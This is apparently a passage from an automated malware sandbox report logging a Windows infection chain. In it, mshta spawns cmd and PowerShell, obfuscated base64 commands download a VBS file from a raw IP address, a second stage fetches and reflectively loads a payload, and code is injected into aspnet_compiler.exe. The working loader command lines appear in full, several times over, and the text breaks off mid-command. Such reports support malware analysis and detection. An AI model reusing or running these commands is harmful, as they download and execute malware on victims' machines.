              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernardaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'je95q1a0tjj6rklbicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhreqtdflqrsagicagicagicagicagicagicagicagicagicagicaglu1ltujlukrfrklusvrpt04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcjvckxnb04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagewpcr1usc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbmcixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagierfcsx1aw50icagicagicagicagicagicagicagicagicagicagicbuved5vhnbbudpayxjbnrqdhigicagicagicagicagicagicagicagicagicagicagietbrkspoycgicagicagicagicagicagicagicagicagicagicagic1oyw1ficagicagicagicagicagicagicagicagicagicagicaiafdyzhhtvwfxzyigicagicagicagicagicagicagicagicagicagicagic1uyu1fu1bhy2ugicagicagicagicagicagicagicagicagicagicagifj3vudyuiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagje95q1a0tjj6rklbojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtq2ljcwljexmy4ymdavmjmxl3nlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmb3j1lnrjriisiirftly6qvbqrefuqvxzzwv0agvizxn0bwfnawnhbhroawduc2dpdmvnb29kzm8udmjtiiwwldapo3n0qxjulxnsrwvwkdmpo0lpicagicagicagicagicagicagicagicagicagicagicaijevodjpbufbeqvrbxhnlzxrozwjlc3rtywdpy2fsdghpz25zz2l2zwdvb2rmby52ylmi'+[char]0x22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $caviloso = 'jglkaw9lbgvjdhjpy2lkywrlid0gj2h0dhbzoi8vmtaxni5mawxlbwfpbc5jb20vyxbpl2zpbguvz2v0p2zpbgvrzxk9sfrvr19fexj1rfiwt0fasdbisep5zxbvclhtdkzfatzqogj3zvrlv0jddte5egnialfonvrrc2e0t0cwtxfjy3fxtkxszyzwa192awq9ztaxmdk2mzhjowjmyjk1nze3mzi3otqzntzhmwzmnmmgjzskdxj1z3vhaw8gpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50oyrlbmnlzmfsyxj0bya9icr1cnvndwfpby5eb3dubg9hzerhdgeojglkaw9lbgvjdhjpy2lkywrlktskahltzw5vdg9tawegpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkzw5jzwzhbgfydg8poyrpbnrlcm1pyxigpsanpdxcqvnfnjrfu1rbulq+pic7jgnvcglvc2ftzw50zsa9icc8pejbu0u2nf9ftkq+pic7jhryyxnsywrhcia9icroew1lbm90b21pys5jbmrlee9mkcrpbnrlcm1pyxipoyryzxnwb25kb25hid0gjgh5bwvub3rvbwlhlkluzgv4t2yojgnvcglvc2ftzw50zsk7jhryyxnsywrhciatz2ugmcatyw5kicryzxnwb25kb25hic1ndcakdhjhc2xhzgfyoyr0cmfzbgfkyxigkz0gjgludgvybwlhci5mzw5ndgg7jgvtcgvsawnhcia9icryzxnwb25kb25hic0gjhryyxnsywrhcjskdw5ndwlmb3jtzsa9icroew1lbm90b21pys5tdwjzdhjpbmcojhryyxnsywrhciwgjgvtcgvsawnhcik7jg1vbgrpbmegpsatam9pbiaojhvuz3vpzm9ybwuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojhvuz3vpzm9ybwuutgvuz3rokv07jhjhymlzywx0b25hid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkbw9szgluysk7jg9jzwfub2xvz2lzdgegpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkcryywjpc2fsdg9uysk7jgfscglyy2hlid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgfscglyy2hllkludm9rzsgkbnvsbcwgqcgndhh0lkfaukhiqvovmtmylzawmi4zmteumdcunjqxly86chr0accsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicckcmvzc3vwaw5hcicsicdhc3buzxrfy29tcglszxinlcanjhjlc3n1cgluyxinlcanjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnjhjlc3n1cgluyxinlcckcmvzc3vwaw5hcicsjyryzxnzdxbpbmfyjywnmscsjyryzxnzdxbpbmfyjykpow==';$bernarda = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($caviloso));invoke-expression $bernarda
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; 